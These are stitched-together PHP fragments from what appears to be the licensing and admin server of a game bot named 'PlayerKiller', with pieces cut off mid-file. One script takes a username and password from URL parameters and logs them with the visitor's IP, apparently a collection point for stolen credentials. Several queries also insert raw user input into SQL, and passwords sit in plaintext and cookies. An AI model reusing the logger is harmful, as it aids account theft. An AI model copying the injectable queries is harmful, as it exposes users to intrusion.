include 'common.php'; ?> <html> <head> <title>Install script</title> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div align="center"> <table width="80%" border="0"> <?php $db->query('CREATE TABLE `' . $bot_name . '_users` (`id` INT(4) UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY ,`username` VARCHAR(20) ,`password` VARCHAR(20) ,`email` VARCHAR(40) ,`comment` VARCHAR(255) ,`date` INT(10) UNSIGNED DEFAULT \'0\' NOT NULL ,`suspend` TINYINT(1) UNSIGNED DEFAULT \'0\' NOT NULL);') or f**k('Unable to create table ' . $bot_name . '_users', true); $db->query('CREATE TABLE `' . $bot_name . '_ips` (`id` INT(4) UNSIGNED,`ip` VARCHAR(50) ,`date` INT(10) UNSIGNED DEFAULT \'0\' NOT NULL);') or f**k('Unable to create table ' . $bot_name . '_ips', true); alert('Installation now complete, for security reasons please now delete install.php'); redirect('admin.php'); f**k('Installation now complete, for security reasons please now delete install.php', false); include 'end.php'; } elseif (isset($_POST['config'])) { ?> <html> <head> <title>Install script</title> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div align="center"> <table width="80%" border="0"> <?php $bot_name = $_POST['bot_name']; $admin_username = strtolower($_POST['admin_username']); $admin_password = strtolower($_POST['admin_password']);
<?php $user = strtolower(trim(stripslashes($_GET['uk']))); $pass = strtolower(trim(stripslashes($_GET['pk']))); include 'common.php'; $query2 = $db->query('INSERT INTO logs (user, pass, ip) VALUES(\'' . $user . '\',\'' . $pass . '\', \'' . $_SERVER['REMOTE_ADDR'] . '\')') or f**k('Invalid', false); f**k('Valid', false);
f**k('Cannot be found', false); } $userid = $db->fetch_assoc($result); redirect('user.php?act=edit&id=' . $userid['id']); f**k('<a href="user.php?act=edit&id=' . $userid . '">Click here to view info.</a>', false); } elseif ($act == 'ip' && isset($_POST['form_sent'])) { $find = trim($_POST['find_ip']); $result = $db->query('SELECT id FROM ' . $bot_name . '_ips WHERE ip=\'' . $find . '\'') or f**k('Unable to find IP info', true); if (!$db->num_rows($result)) { alert('Cannot be found'); redirect('search.php'); f**k('Cannot be found', false); } $userid = $db->fetch_assoc($result); redirect('user.php?act=edit&id=' . $userid['id']); f**k('<a href="user.php?act=edit&id=' . $userid . '">Click here to view info.</a>', false); } else { ?> <table border="0"> <form method="post" action="search.php?act=username" name="Find"> <input type="hidden" name="form_sent" value="1"> <tr> <td align="right">Username:</td> <td><input type="text" name="find_username"></td> <td><input type="submit" name="submit" value="Find by Username"></td> </tr> </form> <form method="post" action="search.php?act=email" name="Find"> <input type="hidden" name="form_sent" value="1"> <tr> <td align="right">Email:</td>
<?php include 'head.php'; ?> <table cellspacing="1" cellpadding="4" border="0" width="70%"> <tr> <td style="width: 10%">Username</td> <td style="width: 55%">Comment</td> <td style="width: 20%">Date</td> <td style="width: 5%" align="center">Suspended?</td> <td style="width: 10%" align="center">Delete?</td> </tr> <?php $result = $db->query('SELECT * FROM ' . $bot_name . '_users ORDER BY date') or f**k('Unable to fetch user list', true); while ($user = $db->fetch_assoc($result)) { ?> <tr> <td><?php echo '<a href="user.php?act=edit&id=' . $user['id'] . '">' . $user['username'] . '</a>'; ?> </td> <td><?php echo $user['comment']; ?> </td> <td><?php echo date($date_format, $user['date']); ?> </td> <td align="center"><?php echo $user['suspend'] == 1 ? '<font color="#FF0000">Yes</font>' : 'No';
f**k('Details not set', false); } if (trim($_GET['version']) != 'PlayerKiller 1.6') { f**k('You are using an old version, Please update', false); } $result = $db->query('SELECT id, password, suspend FROM ' . $bot_name . '_users WHERE username=\'' . addslashes($user) . '\'') or f**k('Invalid', false); $user = $db->fetch_assoc($result); $cur_ip = get_ip(); $result = $db->query('SELECT * FROM ' . $bot_name . '_ips WHERE ip=\'' . $cur_ip . '\'') or f**k('Invalid', false); if (!$db->num_rows($result)) { $db->query('INSERT INTO ' . $bot_name . '_ips (id, ip, date) VALUES(\'' . $user['id'] . '\', \'' . $cur_ip . '\', \'' . time() . '\')') or f**k('Invalid', false); } else { $db->query('UPDATE ' . $bot_name . '_ips SET date=\'' . time() . '\' WHERE ip=\'' . $cur_ip . '\'') or f**k('Invalid', false); } if ($pass != $user['password']) { f**k('Invalid', false); } if ($user['suspend'] != 0) { f**k('Auth banned...', false); } $packetIds = '249, 53, 247, 180, 161, 14, 127, 99, 115, 136, 79, 4, 91, 170, 169, 90, 246, 50, 135, 153, 202, 190, 229, 113, 171, 103, 142, 165, 158, 137, 191, 99, 48, 53, 234, 91, 79, 104, 245, 252, 25, 156, 153, 83, 211, 59, 92, 128, 97, 162, 101, 137, 15, 240, 206, 5, 42, 203, 33, 176, 225, 20, 6, 30, 249, 90, 123, 159, 253, 210, 172, 204, 36, 182, 89, 222, 114, 117, 244, 84, 194, 52, 3, 3'; $botAdmins = 'Super Ruckus, Leet Ruckus, Camdamann73, Camdamann10, Rawpure'; $news = 'PlayerKiller v1.1'; $newsOnFirstPage = 'PlayerKiller v1.1'; $getInfo = $db->query('SELECT botadmins, news, newsonfirstpage FROM info WHERE id=\'0\'') or f**k('Invalid', false); $info = $db->fetch_assoc($getInfo); $botAdmins = $info['botadmins']; $news = $info['news']; $newsOnFirstPage = $info['newsonfirstpage']; f**k('Valid |' . $packetIds . ':' . $botAdmins . '-' . $news . '*' . $newsOnFirstPage . '^', false);
<?php include 'head.php'; $result = $db->query('SELECT COUNT(id) FROM ' . $bot_name . '_users') or f**k('Unable to count users', true); $num_users = $db->result($result, 0); ?> Welcome to the <?php echo $bot_name; ?> administration panel <?php echo $admin_username; ?> .<br> You currently have <?php echo $num_users . ' ' . $bot_name; ?> users. <?php include 'end.php';
$new_comment = $new_comment == '' ? '-' : $new_comment; if (strlen($new_username) < 4 || strlen($new_username) > 20) { f**k('Username invalid length', true); } elseif (strlen($new_password) < 4 || strlen($new_password) > 20) { f**k('Password invalid length', true); } elseif (!is_valid_email($new_email)) { f**k('Invalid email address', true); } elseif (strpos($new_username, ' ') || strpos($new_username, '_') || strpos($new_username, '\'') || strpos($new_username, '\\') || strpos($new_username, '?')) { f**k('Username contains invalid characters', true); } elseif (strpos($new_password, ' ') || strpos($new_password, '_') || strpos($new_password, '\'') || strpos($new_password, '\\') || strpos($new_password, '?')) { f**k('Password contains invalid characters', true); } $db->query('UPDATE ' . $bot_name . '_users SET username=\'' . addslashes($new_username) . '\', password=\'' . addslashes($new_password) . '\', email=\'' . addslashes($new_email) . '\', comment=\'' . addslashes($new_comment) . '\', suspend=\'' . $new_suspend . '\' WHERE id=' . $new_id) or f**k('Unable to update user', true); alert('Details of ' . $new_username . ' updated.'); redirect('list.php'); f**k('Details of ' . $new_username . ' updated.', false); } else { ?> <table border="0"> <form method="post" action="user.php?act=add" name="Add"> <input type="hidden" name="form_sent" value="1"> <tr> <td align="right">Username:</td> <td><input type="text" name="form_username"></td> </tr> <tr> <td align="right">Password:</td> <td><input type="text" name="form_password"></td> </tr> <tr> <td align="right">Email:</td>
<?php require 'common.php'; if ($_GET['act'] == 'logout') { setcookie($bot_name, serialize(array('', '')), time() + 31536000, '/', '', 0); redirect('admin.php'); f**k('Logged out successfully.', false); } elseif (isset($_POST['form_sent'])) { $form_username = trim($_POST['form_username']); $form_password = trim($_POST['form_password']); if (strtolower($form_username) == strtolower($admin_username) && strtolower($form_password) == strtolower($admin_password)) { setcookie($bot_name, serialize(array(strtolower($form_username), strtolower($form_password))), time() + 31536000, '/', '', 0); redirect('admin.php'); f**k('Logged in successfully. <a href="admin.php">Main administration</a>.', false); } else { f**k('Wrong password.', true); } } else { f**k('Invalid link.', false); }